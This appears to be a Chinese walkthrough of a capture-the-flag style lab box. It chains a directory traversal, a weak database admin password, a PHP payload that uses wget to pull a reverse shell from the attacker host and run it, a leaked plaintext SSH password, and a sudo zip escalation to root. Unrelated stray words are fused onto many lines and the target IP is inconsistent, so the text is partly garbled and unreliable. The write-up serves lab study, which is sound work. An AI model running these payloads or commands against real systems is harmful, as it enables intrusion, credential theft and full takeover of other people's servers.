主機:192.168.32.152php
靶機:192.168.32.163
web
目錄遍歷攻擊又稱(目錄爬升,目錄回溯,點-點斜線),指再訪問存儲在web根文件之夾外的文件和目錄,經過操控帶有"點-斜線(..):序列及變化的文件或使用絕對文件夾路徑來引用文件的變量,能夠訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼,配置文件信息和關鍵系統文件。shell
系統訪問控制(如在微軟windows系統上鎖定或使用文件)限制了對文件的訪問權限。
數據庫
nmap,dirb掃描windows
開放了ssh,http服務還有111端口bash
dbadmin 測下下弱口令admin。直接能夠登陸ssh
用掃描器掃,發現存在目錄遍歷高位漏洞優化
訪問下看看:能夠看到etc/passwd目錄下的用戶3d
http://192.168.32.163/view.php?page=%20../../../../../../../../../../etc/passwdblog
那麼咱們就能夠上傳一個shell到數據庫,再監聽
先將/usr/share/webshells/php 下的 reverse_webshell 複製到桌面上,設置ip和監聽端口,修更名爲shell.php
打開數據庫管理頁面,發現若是建一個.php名字的數據庫,利用遍歷目錄漏洞時就能夠執行php文件,達到反彈shell的目的
建好庫後添加數據表,字段(寫入
<?php system("cd /tmp; wget http://192.168.32.152:8000/shell.php;chmod +x shell.php;
php shell.php");?>
成功反彈shell!
pty優化終端,
而後在home目錄下發現有一個用戶zico, config文件中發現了對應的數據庫的密碼
那就試試ssh登陸 ssh zico@192.168.32.162
密碼:sWfCsfJSPV9H3AmQzw8
登陸成功後sudo -l 發現 能夠使用zip繼續提權
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
提權成功!
最終獲得root權限